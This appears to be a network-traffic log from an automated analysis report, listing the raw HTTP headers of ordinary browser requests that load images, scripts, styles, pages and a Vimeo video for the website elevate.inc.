Source: global traffic	HTTP traffic detected: GET /6537d1496ae55969d9298a91/65937a3a0452f1b9e23ad838_logo12.webp HTTP/1.1host: cdn.prod.website-files.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: imagesec-fetch-storage-access: activereferer: https://www.elevate.inc/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=2, i
Source: global traffic	HTTP traffic detected: GET /api/player.js HTTP/1.1Host: player.vimeo.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://www.elevate.inc/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /654105530b98111cede036db/67de40df9813cb129fbf4dfb_FinTech_Breakthrough_Award_2025-Color-Year%20(1).png HTTP/1.1host: cdn.prod.website-files.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: imagesec-fetch-storage-access: activereferer: https://www.elevate.inc/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=2, i
Source: global traffic	HTTP traffic detected: GET /654105530b98111cede036db/67bf45c6067d5f46c28dc39e_pr-newswire-logo-full-color-rgb.png HTTP/1.1host: cdn.prod.website-files.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: imagesec-fetch-storage-access: activereferer: https://www.elevate.inc/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=2, i
Source: global traffic	HTTP traffic detected: GET /6537d1496ae55969d9298a91/css/elevate-redesign.shared.cb8a3df76.min.css HTTP/1.1host: cdn.prod.website-files.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: text/css,/;q=0.1sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: stylesec-fetch-storage-access: activereferer: https://www.elevate.inc/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=0
Source: global traffic	HTTP traffic detected: GET /6537d1496ae55969d9298a91/js/elevate-redesign.schunk.36b8fb49256177c8.js HTTP/1.1host: cdn.prod.website-files.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: scriptsec-fetch-storage-access: activereferer: https://www.elevate.inc/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=2
Source: global traffic	HTTP traffic detected: GET /654105530b98111cede036db/659d84d7482ac5ec161a85c2_63628f1c59c33f5363f3b113_employeebenefitnews-brand-logo-color-no-padding.svg HTTP/1.1host: cdn.prod.website-files.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: imagesec-fetch-storage-access: activereferer: https://www.elevate.inc/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: i
Source: global traffic	HTTP traffic detected: GET /654105530b98111cede036db/659d85daacb0ee65e4fec540_62abedd69e2a1d691620bb64_hrtech%2520(1).avif HTTP/1.1host: cdn.prod.website-files.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: imagesec-fetch-storage-access: activereferer: https://www.elevate.inc/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: i
Source: global traffic	HTTP traffic detected: GET /6537d1496ae55969d9298a91/js/elevate-redesign.9f6e0829.939bacf454813a58.js HTTP/1.1host: cdn.prod.website-files.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: scriptsec-fetch-storage-access: activereferer: https://www.elevate.inc/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=2
Source: global traffic	HTTP traffic detected: GET /654105530b98111cede036db/659d85dbc07d34d672d8712d_63628ee14a7843d2f27b559f_benefitspro-logo-865x295.avif HTTP/1.1host: cdn.prod.website-files.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: imagesec-fetch-storage-access: activereferer: https://www.elevate.inc/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: i
Source: global traffic	HTTP traffic detected: GET /654105530b98111cede036db/659d85dad1c8ab250a1bb658_620a8fd2dbed87842d9c0a00_pr-newswire-logo.avif HTTP/1.1host: cdn.prod.website-files.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: imagesec-fetch-storage-access: activereferer: https://www.elevate.inc/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: i
Source: global traffic	HTTP traffic detected: GET /654105530b98111cede036db/659d85db79bd0e25b6f57aec_62abf1504d07fa11cd45af6f_PYMNTS-logo-green%25201%2520(1).avif HTTP/1.1host: cdn.prod.website-files.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: imagesec-fetch-storage-access: activereferer: https://www.elevate.inc/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: i
Source: global traffic	HTTP traffic detected: GET /654105530b98111cede036db/659d84e639c50a31518316b0_64baf3d6c359f158a0977c2d_benefitspro.avif HTTP/1.1host: cdn.prod.website-files.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: imagesec-fetch-storage-access: activereferer: https://www.elevate.inc/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: i
Source: global traffic	HTTP traffic detected: GET /654105530b98111cede036db/66e3279237aef04dc35516ef_benefitspro.avif HTTP/1.1host: cdn.prod.website-files.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: imagesec-fetch-storage-access: activereferer: https://www.elevate.inc/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: i
Source: global traffic	HTTP traffic detected: GET /654105530b98111cede036db/66d8804d98330a06f1ef82a5_659d85dad1c8ab250a1bb658_620a8fd2dbed87842d9c0a00_pr-newswire-logo.avif HTTP/1.1host: cdn.prod.website-files.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: imagesec-fetch-storage-access: activereferer: https://www.elevate.inc/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: i
Source: global traffic	HTTP traffic detected: GET /654105530b98111cede036db/659d84d6a02c61fd03773aef_620a8cd05162759375e5b000_employeebenefitnews-brand-logo-initials-01.svg HTTP/1.1host: cdn.prod.website-files.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: imagesec-fetch-storage-access: activereferer: https://www.elevate.inc/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: i
Source: global traffic	HTTP traffic detected: GET /654105530b98111cede036db/67bf45c6067d5f46c28dc39e_pr-newswire-logo-full-color-rgb.png HTTP/1.1host: cdn.prod.website-files.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: /sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /654105530b98111cede036db/659d84d8756d3958917d9c6a_61e83a62bf43923885d61816_built-in-colorado-logo.avif HTTP/1.1host: cdn.prod.website-files.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: imagesec-fetch-storage-access: activereferer: https://www.elevate.inc/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: i
Source: global traffic	HTTP traffic detected: GET /654105530b98111cede036db/659d84d64dab0e91b180b0a1_62d9e9960d2a19b98cd37877_benefitspro-footer-logo.webp HTTP/1.1host: cdn.prod.website-files.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: imagesec-fetch-storage-access: activereferer: https://www.elevate.inc/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: i
Source: global traffic	HTTP traffic detected: GET /654105530b98111cede036db/659d84d6981620aca717f18b_645ab858fc8d736eb0ea829d_1200px-TechCrunch_logo.svg%2520(1).png HTTP/1.1host: cdn.prod.website-files.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: imagesec-fetch-storage-access: activereferer: https://www.elevate.inc/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: i
Source: global traffic	HTTP traffic detected: GET /654105530b98111cede036db/659d84d642457f9a904abf3e_62029c49093069f37039eaba_technically%2520baltimore%2520logo.avif HTTP/1.1host: cdn.prod.website-files.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: imagesec-fetch-storage-access: activereferer: https://www.elevate.inc/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: i
Source: global traffic	HTTP traffic detected: GET /654105530b98111cede036db/659d84d7f9942d052cbde9dd_62ab8fff6676244596d3e657_logo-1.avif HTTP/1.1host: cdn.prod.website-files.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: imagesec-fetch-storage-access: activereferer: https://www.elevate.inc/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: i
Source: global traffic	HTTP traffic detected: GET /654105530b98111cede036db/659d84d734ec4c1a87185071_61f964502425d5694395c0da_tech-crunch-logo.png HTTP/1.1host: cdn.prod.website-files.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: imagesec-fetch-storage-access: activereferer: https://www.elevate.inc/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: i
Source: global traffic	HTTP traffic detected: GET /6537d1496ae55969d9298a91/65aecfb3e0847f76c91dfc6a_icon_automation.svg HTTP/1.1host: cdn.prod.website-files.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: imagesec-fetch-storage-access: activereferer: https://www.elevate.inc/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: i
Source: global traffic	HTTP traffic detected: GET /654105530b98111cede036db/659d84d8482ac5ec161a86d9_64baf362c1aaca06d73b4f71_anthemis%2520insights.avif HTTP/1.1host: cdn.prod.website-files.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: imagesec-fetch-storage-access: activereferer: https://www.elevate.inc/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: i
Source: global traffic	HTTP traffic detected: GET /6537d1496ae55969d9298a91/6814767b68efbf457c71041c_67213321960af3e15206fb23_670421de247a5a4a48c580f1_RMRlogo600dp1.avif HTTP/1.1host: cdn.prod.website-files.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: imagesec-fetch-storage-access: activereferer: https://www.elevate.inc/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: i
Source: global traffic	HTTP traffic detected: GET /654105530b98111cede036db/659d84d6a2501869585791dd_62029bc50941c284d8f4d49e_benefitspro%2520logo.avif HTTP/1.1host: cdn.prod.website-files.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: imagesec-fetch-storage-access: activereferer: https://www.elevate.inc/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: i
Source: global traffic	HTTP traffic detected: GET /6537d1496ae55969d9298a91/658c475399e5cbfecce1c499_elevate%20-%20logo%20white.webp HTTP/1.1host: cdn.prod.website-files.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: imagesec-fetch-storage-access: activereferer: https://www.elevate.inc/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: i
Source: global traffic	HTTP traffic detected: GET /6537d1496ae55969d9298a91/658c59bd6f7007cb92213a3a_icon_finance_1.svg HTTP/1.1host: cdn.prod.website-files.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: imagesec-fetch-storage-access: activereferer: https://www.elevate.inc/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: i
Source: global traffic	HTTP traffic detected: GET /6537d1496ae55969d9298a91/65aecfb356fccb79839880ab_icon_health-plans_1.svg HTTP/1.1host: cdn.prod.website-files.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: imagesec-fetch-storage-access: activereferer: https://www.elevate.inc/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: i
Source: global traffic	HTTP traffic detected: GET /6537d1496ae55969d9298a91/65aecfb45ab1bb7a4a8ebddf_icon_third-party_1.svg HTTP/1.1host: cdn.prod.website-files.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: imagesec-fetch-storage-access: activereferer: https://www.elevate.inc/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: i
Source: global traffic	HTTP traffic detected: GET /6537d1496ae55969d9298a91/6830f94bb1339e06239d3298_Screens_2025_v3.png HTTP/1.1host: cdn.prod.website-files.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: imagesec-fetch-storage-access: activereferer: https://www.elevate.inc/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: i
Source: global traffic	HTTP traffic detected: GET /6537d1496ae55969d9298a91/68146d8aceebfcc75b9b7b40_rippling.png HTTP/1.1host: cdn.prod.website-files.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: imagesec-fetch-storage-access: activereferer: https://www.elevate.inc/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: i
Source: global traffic	HTTP traffic detected: GET /component-parts HTTP/1.1host: www.elevate.incsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7purpose: prefetchsec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: emptyreferer: https://www.elevate.inc/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=4, i
Source: global traffic	HTTP traffic detected: GET /use-cases/third-party-administrators HTTP/1.1host: www.elevate.incsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7purpose: prefetchsec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: emptyreferer: https://www.elevate.inc/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=4, i
Source: global traffic	HTTP traffic detected: GET /654105530b98111cede036db/67de40df9813cb129fbf4dfb_FinTech_Breakthrough_Award_2025-Color-Year%20(1).png HTTP/1.1host: cdn.prod.website-files.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: /sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /resource-center HTTP/1.1host: www.elevate.incsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7purpose: prefetchsec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: emptyreferer: https://www.elevate.inc/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=4, i
Source: global traffic	HTTP traffic detected: GET /video/961277965?autoplay=0&muted=1&loop=1&background=0 HTTP/1.1Host: player.vimeo.comConnection: keep-alivesec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeSec-Fetch-Storage-Access: activeReferer: https://www.elevate.inc/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=AEavhtdI_PLldZE5nidl_6HspN587FQjguzExV.TNz0-1749250528-1.0.1.1-AaFL6i3yjww_MMr3x42iUqucsa1WEWsvYvf00avmQTwANX99C2bjRA4fQcD0_DA8; _cfuvid=Ga5wb9Edq3HlTeWPcoSeKVx2IOI3gG0Ki.DqRa3b5vY-1749250528014-0.0.1.1-604800000
Source: global traffic	HTTP traffic detected: GET /use-cases/financial-institutions HTTP/1.1host: www.elevate.incsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7purpose: prefetchsec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: emptyreferer: https://www.elevate.inc/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=4, i
